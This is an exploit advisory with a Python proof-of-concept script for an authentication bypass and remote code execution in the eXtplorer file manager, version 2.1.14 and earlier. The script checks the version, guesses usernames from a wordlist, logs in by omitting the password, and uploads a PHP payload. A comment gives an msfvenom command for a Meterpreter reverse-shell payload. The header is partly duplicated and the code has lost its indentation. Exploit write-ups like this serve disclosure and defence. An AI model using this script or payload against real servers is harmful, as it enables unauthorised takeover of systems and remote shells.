# Exploit Author: ErPaciocco
# Author Website: https://erpaciocco.github.io
# Vendor # Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)
# Exploit Author: ErPaciocco
# Author Website: https://erpaciocco.github.io
# Vendor Homepage: https://extplorer.net/
#
# Vendor:
# ==============
# extplorer.net
#
# Product:
# ==================
# eXtplorer <= v2.1.14
#
# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
# directories, edit, copy, move, delete,
# search, upload and download files, create & extract archives, create new
# files and directories, change file
# permissions (chmod) and more. It is often used as FTP extension for popular
# applications like Joomla.
#
# Vulnerability Type:
# ======================
# Authentication Bypass (& Remote Command Execution)
#
#
# Vulnerability Details:
# =====================
#
# eXtplorer authentication mechanism allows an attacker
# to login into the Admin Panel without knowing the password
# of the victim, but only its username. This vector is exploited
# by not supplying password in POST request.
#
#
# Tested on Windows
#
#
# Reproduction steps:
# ==================
#
# 1) Navigate to Login Panel
# 2) Intercept authentication POST request to /index.php
# 3) Remove 'password' field
# 4) Send it and enjoy!
#
#
# Exploit code(s):
# ===============
#
# Run below PY script from CLI...
#
# [eXtplorer_auth_bypass.py]
#
# Proof Of Concept
try:
import requests
except:
print(f"ERROR: RUN: pip install requests")
exit()
import sys
import time
import urllib.parse
import re
import random
import string
import socket
import time
import base64
TARGET = None
WORDLIST = None
_BUILTIN_WL = [
'root',
'admin',
'test',
'guest',
'info',
'adm',
'user',
'administrator'
]
_HOST = None
_PATH = None
_SESSION = None
_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive' }
def detect():
global _HOST
global _PATH
global _SESSION
global _HEADERS
_HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]
_PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')
_SESSION = requests.Session()
raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)
if raw.status_code == 200:
ver = re.findall("<version>(((d+).?)+)</version>", raw.text, re.MULTILINE)
if int(ver[0][2]) < 15:
return True
return False
def auth_bypass():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global WORDLIST
global _BUILTIN_WL
_HEADERS['X-Requested-With'] = 'XMLHttpRequest'
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': 'admin',
'lang':'english'}
if WORDLIST != None:
if WORDLIST == _BUILTIN_WL:
info(f"Attempting to guess an username from builtin wordlist")
wl = _BUILTIN_WL
else:
info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")
with open(WORDLIST[0], "r") as f:
wl = f.read().split(' ')
for user in wl:
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': user,
'lang':'english'}
info(f"Trying with {user}")
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return (user)
else:
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return ('admin')
return False
def rce():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global _PAYLOAD
tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
token = re.findall("token:s"([a-f0-9]{32})"", tokenReq.text)[0]
info(f"CSRF Token obtained: {token}")
payload = editPayload()
info(f"Payload edited to fit local parameters")
params = {'option': 'com_extplorer',
'action': 'upload',
'dir': f"./{_PATH}",
'requestType': 'xmlhttprequest',
'confirm':'true',
'token': token}
name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
files = {'userfile[0]':(f"{name}.php", payload)}
req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)
if "successful" in req.text:
info(f"File {name}.php uploaded in root dir")
info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")
def attack():
if not TARGET:
error("TARGET needed")
if TARGET:
if not detect():
error("eXtplorer vulnerable instance not found!")
exit(1)
else:
info("eXtplorer endpoint is vulnerable!")
username = auth_bypass()
if username:
info("Auth bypassed!")
rce()
else:
error("Username 'admin' not found")
def error(message):
print(f"[E] {message}")
def info(message):
print(f"[I] {message}")
def editPayload():
# You can generate payload with msfvenom and paste below base64 encoded result
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64
return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")
def help():
print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution
Usage:
python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]
Options:
-t Target host. Provide target IP address (and optionally port).
-w Wordlist for user enumeration and authentication (Optional)
-wb Use built-in wordlist for user enumeration (Optional)
-h Show this help menu.
""")
return True
args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),
"w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),
"wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),
"h" : (0, lambda *x: (help() and exit(0)))}
if __name__ == "__main__":
i = 1
[
args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ])
for arg in [k
for k in sys.argv[i:]
]
if arg[0] == '-'
]
attack()
else:
help()
# ///////////////////////////////////////////////////////////////////////
# [Script examples]
#
#
# c:>python eXtplorer_auth_bypass.py -t https://target.com
# c:>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt
# c:>python eXtplorer_auth_bypass.py -t http://target.com -wb
# Exploitation Method:
# ======================
# Remote
# [+] Disclaimer
# The information contained within this advisory is supplied "as-is" with no
# warranties or guarantees of fitness of use or otherwise.
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and
# that due credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit
# is given to the author. The author is not responsible for any misuse of the
# information contained herein and accepts no responsibility
# for any damage caused by the use or misuse of this information.